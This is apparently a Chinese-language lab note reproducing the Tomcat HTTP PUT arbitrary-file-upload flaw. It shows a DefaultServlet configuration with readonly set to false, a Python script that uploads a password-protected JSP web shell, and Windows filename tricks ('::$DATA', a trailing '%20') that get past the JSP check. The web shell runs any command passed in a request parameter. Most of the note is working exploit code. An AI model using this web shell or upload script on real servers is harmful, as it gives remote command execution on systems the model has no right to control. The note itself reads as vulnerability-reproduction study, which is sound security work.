启动tomcat
成因
允许put 自己加因为后来修复了
<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
状态码201 上传成功,204已存在
验证马
import urllib3
class RequestAbs:
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64)',
}
http = urllib3.PoolManager()
status = 0
def POST(self,url,header = headers,retries=False,redirect=False,body = """"""):
response = self.http.request('POST', url, body=body, headers=header,redirect=redirect,retries=retries)
self.status = response.status
return response
def GET(self,url,header = headers,retries=False,redirect=False):
response = self.http.request('GET',url, retries=retries, redirect=redirect,headers=header)
self.status = response.status
return response
def PUT(self,url,header = headers,retries=False,redirect=False,body = """"""):
response = self.http.request('PUT', url, retries=retries, redirect=redirect, headers=header,body=body)
self.status = response.status
return response
def DAta(self,response,encode = "'utf-8'"):
return response.data.decode(encode)
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
RE = RequestAbs()
DAta = RE.PUT(
url="http://localhost:8080/l.jsp/",
body=body
)
print(RE.DAta(DAta))
print(RE.status)
利用Windows特性以下面两种方式上传文件时,tomcat并不认为其是jsp文件从而交由DefaultServlet处理,从而成功创建jsp文件
如
xxx.jsp::$DATA
xxx.jsp%20
官方如何修复的??
next
原理借鉴
https://developer.aliyun.com/article/213792